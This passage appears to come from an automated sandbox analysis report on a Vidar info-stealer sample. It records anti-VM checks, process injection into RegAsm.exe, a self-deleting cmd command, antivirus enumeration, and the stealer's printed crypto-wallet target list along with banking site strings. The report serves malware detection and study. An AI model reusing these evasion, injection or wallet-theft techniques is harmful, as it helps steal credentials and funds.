cAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.7 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 5820Thread sleep count: 88 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h2_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC5AC6 FindFirstFileExW,0_2_00AC5AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FE81 GetSystemInfo,wsprintfA,2_2_0040FE81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: JDGCGD.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: JDGCGD.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: JDGCGD.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: JDGCGD.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: JDGCGD.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: JDGCGD.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: JDGCGD.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: JDGCGD.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: JDGCGD.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: JDGCGD.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: JDGCGD.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: JDGCGD.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegAsm.exe, 00000002.00000002.2641787959.0000000000D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: JDGCGD.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: JDGCGD.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-69769
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABA293 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ABA293
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1335 mov eax, dword ptr fs:[00000030h]0_2_00AC1335
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABE380 mov ecx, dword ptr fs:[00000030h]0_2_00ABE380
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1379 mov eax, dword ptr fs:[00000030h]0_2_00AC1379
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC9290 GetProcessHeap,0_2_00AC9290
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABA293 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ABA293
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB623F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AB623F
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB6549 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AB6549
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB66A5 SetUnhandledExceptionFilter,0_2_00AB66A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041937F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E438 SetUnhandledExceptionFilter,2_2_0041E438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A8A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C7EB66C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C7EB1F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C99AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C99AC62

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0149018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_0149018D
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Searches for specific processes (likely to inject)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BB5008Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB602C cpuid 0_2_00AB602C
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00AC902E
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00AC1075
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC89B7
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC896C
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00AC8ADD
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC8A52
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC0B0F
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00AC8D30
                  Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00AC86CA
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00AC8E59
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00AC8F5F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB643C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AB643C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,2_2_0040FBCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_0040FC92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
